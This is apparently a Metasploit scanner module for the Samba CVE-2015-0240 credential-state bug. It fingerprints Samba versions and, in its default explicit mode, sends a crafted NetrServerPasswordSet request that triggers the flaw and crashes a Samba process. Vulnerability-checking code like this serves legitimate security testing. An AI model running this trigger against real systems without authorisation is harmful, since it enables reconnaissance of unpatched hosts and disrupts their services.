Samba _netr_ServerPasswordSet Uninitialized Credential State

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
  
class MetasploitModule < Msf::Auxiliary  
  
# Exploit mixins should be called first  
include Msf::Exploit::Remote::DCERPC  
include Msf::Exploit::Remote::SMB::Client  
include Msf::Exploit::Remote::SMB::Client::Authenticated  
  
# Scanner mixin should be near last  
include Msf::Auxiliary::Scanner  
include Msf::Auxiliary::Report  
  
# Aliases for common classes  
SIMPLE = Rex::Proto::SMB::SimpleClient  
XCEPT = Rex::Proto::SMB::Exceptions  
CONST = Rex::Proto::SMB::Constants  
  
RPC_NETLOGON_UUID = '12345678-1234-abcd-ef00-01234567cffb'  
  
def initialize(info={})  
super(update_info(info,  
'Name' => 'Samba _netr_ServerPasswordSet Uninitialized Credential State',  
'Description' => %q{  
This module checks if a Samba target is vulnerable to an uninitialized variable creds vulnerability.  
},  
'Author' =>  
[  
'Richard van Eeden', # Original discovery  
'sleepya', # Public PoC for the explicit check  
'sinn3r'  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['CVE', '2015-0240'],  
['OSVDB', '118637'],  
['URL', 'https://www.redhat.com/en/blog/samba-vulnerability-cve-2015-0240'],  
['URL', 'https://gist.github.com/worawit/33cc5534cb555a0b710b'],  
['URL', 'https://www.nccgroup.com/en/blog/2015/03/samba-_netr_serverpasswordset-expoitability-analysis/']  
],  
'DefaultOptions' =>  
{  
'SMBDirect' => true,  
'SMBPass' => '',  
'SMBUser' => '',  
'SMBDomain' => '',  
'DCERPC::fake_bind_multi' => false  
}  
))  
  
# This is a good example of passive vs explicit check  
register_options([  
OptBool.new('PASSIVE', [false, 'Try banner checking instead of triggering the bug', false])  
])  
  
# It's either 139 or 445. The user should not touch this.  
deregister_options('RPORT')  
end  
  
def rport  
@smb_port || datastore['RPORT']  
end  
  
  
# This method is more explicit, but a major downside is it's very slow.  
# So we leave the passive one as an option.  
# Please also see #maybe_vulnerable?  
def is_vulnerable?(ip)  
begin  
connect  
smb_login  
handle = dcerpc_handle(RPC_NETLOGON_UUID, '1.0','ncacn_np', ["\\netlogon"])  
dcerpc_bind(handle)  
rescue ::Rex::Proto::SMB::Exceptions::LoginError,  
::Rex::Proto::SMB::Exceptions::ErrorCode => e  
elog(e)  
return false  
rescue Errno::ECONNRESET,  
::Rex::Proto::SMB::Exceptions::InvalidType,  
::Rex::Proto::SMB::Exceptions::ReadPacket,  
::Rex::Proto::SMB::Exceptions::InvalidCommand,  
::Rex::Proto::SMB::Exceptions::InvalidWordCount,  
::Rex::Proto::SMB::Exceptions::NoReply => e  
elog(e)  
return false  
rescue ::Exception => e  
elog(e)  
return false  
end  
  
# NetrServerPasswordSet request packet  
stub =  
[  
0x00, # Server handle  
0x01, # Max count  
0x00, # Offset  
0x01, # Actual count  
0x00, # Account name  
0x02, # Sec Chan Type  
0x0e, # Max count  
0x00, # Offset  
0x0e # Actual count  
].pack('VVVVvvVVV')  
  
stub << Rex::Text::to_unicode(ip) # Computer name  
stub << [0x00].pack('v') # Null byte terminator for the computer name  
stub << '12345678' # Credential  
stub << [0x0a].pack('V') # Timestamp  
stub << "\x00" * 16 # Padding  
  
begin  
dcerpc.call(0x06, stub)  
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e  
elog(e)  
rescue Errno::ECONNRESET,  
::Rex::Proto::SMB::Exceptions::InvalidType,  
::Rex::Proto::SMB::Exceptions::ReadPacket,  
::Rex::Proto::SMB::Exceptions::InvalidCommand,  
::Rex::Proto::SMB::Exceptions::InvalidWordCount,  
::Rex::Proto::SMB::Exceptions::NoReply => e  
elog(e)  
rescue ::Exception => e  
if e.to_s =~ /execution expired/i  
# So what happens here is that when you trigger the buggy code path, you hit this:  
# Program received signal SIGSEGV, Segmentation fault.  
# 0xb732ab3b in talloc_chunk_from_ptr (ptr=0xc) at ../lib/talloc/talloc.c:370  
# 370 if (unlikely((tc->flags & (TALLOC_FLAG_FREE | ~0xF)) != TALLOC_MAGIC)) {  
# In the Samba log, you'll see this as an "internal error" and there will be a "panic action".  
# And then Samba will basically not talk back to you at that point. In that case,  
# you will either lose the connection, or timeout, or whatever... depending on the SMB  
# API you're using. In our case (Metasploit), it's "execution expired."  
# Samba (daemon) will stay alive, so it's all good.  
return true  
else  
raise e  
end  
end  
  
false  
ensure  
disconnect  
end  
  
  
# Returns the Samba version  
def get_samba_info  
res = ''  
begin  
res = smb_fingerprint  
rescue ::Rex::Proto::SMB::Exceptions::LoginError,  
::Rex::Proto::SMB::Exceptions::ErrorCode  
return res  
rescue Errno::ECONNRESET,  
::Rex::Proto::SMB::Exceptions::InvalidType,  
::Rex::Proto::SMB::Exceptions::ReadPacket,  
::Rex::Proto::SMB::Exceptions::InvalidCommand,  
::Rex::Proto::SMB::Exceptions::InvalidWordCount,  
::Rex::Proto::SMB::Exceptions::NoReply  
return res  
rescue ::Exception => e  
if e.to_s =~ /execution expired/  
return res  
else  
raise e  
end  
ensure  
disconnect  
end  
  
res['native_lm'].to_s  
end  
  
  
# Converts a version string into an object so we can eval it  
def version(v)  
Rex::Version.new(v)  
end  
  
  
# Passive check for the uninitialized bug. The information is based on http://cve.mitre.org/  
def maybe_vulnerable?(samba_version)  
v = samba_version.scan(/Samba (\d+\.\d+\.\d+)/).flatten[0] || ''  
return false if v.empty?  
found_version = version(v)  
  
if found_version >= version('3.5.0') && found_version <= version('3.5.9')  
return true  
elsif found_version >= version('3.6.0') && found_version < version('3.6.25')  
return true  
elsif found_version >= version('4.0.0') && found_version < version('4.0.25')  
return true  
elsif found_version >= version('4.1.0') && found_version < version('4.1.17')  
return true  
end  
  
false  
end  
  
  
# Check command  
def check_host(ip)  
samba_info = ''  
smb_ports = [445, 139]  
smb_ports.each do |port|  
@smb_port = port  
samba_info = get_samba_info  
vprint_status("Samba version: #{samba_info}")  
  
if samba_info !~ /^samba/i  
vprint_status("Target isn't Samba, no check will run.")  
return Exploit::CheckCode::Safe  
end  
  
if datastore['PASSIVE']  
if maybe_vulnerable?(samba_info)  
flag_vuln_host(ip, samba_info)  
return Exploit::CheckCode::Appears  
end  
else  
# Explicit: Actually triggers the bug  
if is_vulnerable?(ip)  
flag_vuln_host(ip, samba_info)  
return Exploit::CheckCode::Vulnerable  
end  
end  
end  
  
return Exploit::CheckCode::Detected if samba_info =~ /^samba/i  
  
Exploit::CheckCode::Safe  
end  
  
  
# Reports to the database about a possible vulnerable host  
def flag_vuln_host(ip, samba_version)  
report_vuln(  
:host => ip,  
:port => rport,  
:proto => 'tcp',  
:name => self.name,  
:info => samba_version,  
:refs => self.references  
)  
end  
  
  
def run_host(ip)  
peer = "#{ip}:#{rport}"  
case check_host(ip)  
when Exploit::CheckCode::Vulnerable  
print_good("The target is vulnerable to CVE-2015-0240.")  
when Exploit::CheckCode::Appears  
print_good("The target appears to be vulnerable to CVE-2015-0240.")  
when Exploit::CheckCode::Detected  
print_status("The target appears to be running Samba.")  
else  
print_status("The target appears to be safe")  
end  
end  
end  
  
`